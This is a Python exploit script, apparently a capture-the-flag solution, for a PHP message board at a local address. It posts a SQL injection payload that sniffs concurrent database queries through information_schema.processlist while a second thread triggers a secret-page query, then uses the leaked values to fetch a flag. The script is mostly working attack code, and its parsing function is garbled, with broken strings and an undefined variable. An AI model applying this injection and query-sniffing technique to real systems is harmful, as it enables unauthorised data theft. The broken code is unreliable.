import requests import threading import time ID = "sakuya" PW = "sakuya" TIMER = 10 HOST = "http://192.168.1.17/" def Register(user,pw): s = requests.session() data = {"id":user,"pw":pw} RegPage = HOST+"reg_check.php" r = s.post(RegPage,data=data) if "welcome" not in r.text: return False else: return True def Login(user,pw): s = requests.session() data = {"id":user,"pw":pw} LoginPage = HOST + "login_check.php" r = s.post(LoginPage,data=data) if "Error" in r.text: return False return s def secret_Refresh(s): SecretPage = HOST+"?p=secret" for i in range(1,TIMER): time.sleep(1) s.get(SecretPage) print "[Thread 2] Refresh Count[{}]".format(i) print "[Thread 2] Job done!!" def write_bbs(s): SQL_Payload = "'),('answer','{}',(SELECT a.b FROM (SELECT @dummy, @query:='',@tmp:=0x20, benchmark(500000,(@tmp:= (SELECT Group_concat(info) FROM information_schema.processlist WHERE info not like '%dummy%' or sleep(0)))or(IF((@query not like concat('%',@tmp,'%')),@query:=concat(@query,@tmp,0x0a),0))), @query`b`)`a`))#".format(ID) data = {"title":"TITLE","contents":SQL_Payload} WritePage = HOST+"write_ok.php" print("[Thread 1] Write BBS..") start = time.time() r = s.post(WritePage,data=data) if "OK" in r.text: end = time.time() print("[Thread 1] Write OK. {} second !!".format(end-start)) else: print("Error Occur") def getLastArticle(s): import re BBSPage = HOST+"?p=diary" ReadPage = HOST+"?p=read&no=" patt = "',"") splited = contents.split("\n") for row in splited: if ID in row: splited = row.split(" ") T = splited[6].split("_")[2][:-1] F = splited[8].split("_")[1][:-3] C = splited[8].split("_")[2][:-2] return C,T,F def getFlag(s,C,T,F): import re params = {"p":"secret","C":C,"T":T,"F":F} r = s.get(HOST,params = params) patt = "FLAG{.*}" Flag = re.findall(patt,r.text)[0] return Flag if __name__ == "__main__": print("[MAIN] Reg/Login") Register(ID,PW) s1 = Login(ID,PW) s2 = Login(ID,PW) print("[MAIN] Exploit, Query sniff") t1 = threading.Thread(target = write_bbs, args=(s1,)) t2 = threading.Thread(target = secret_Refresh, args=(s2,)) t1.start() t2.start() t2.join() C,T,F = getLastArticle(s1) print("[MAIN] C: {}\nT: {}\nF: {}\n").format(C,T,F) print "[MAIN] FLAG : {}".format(getFlag(s2,C,T,F))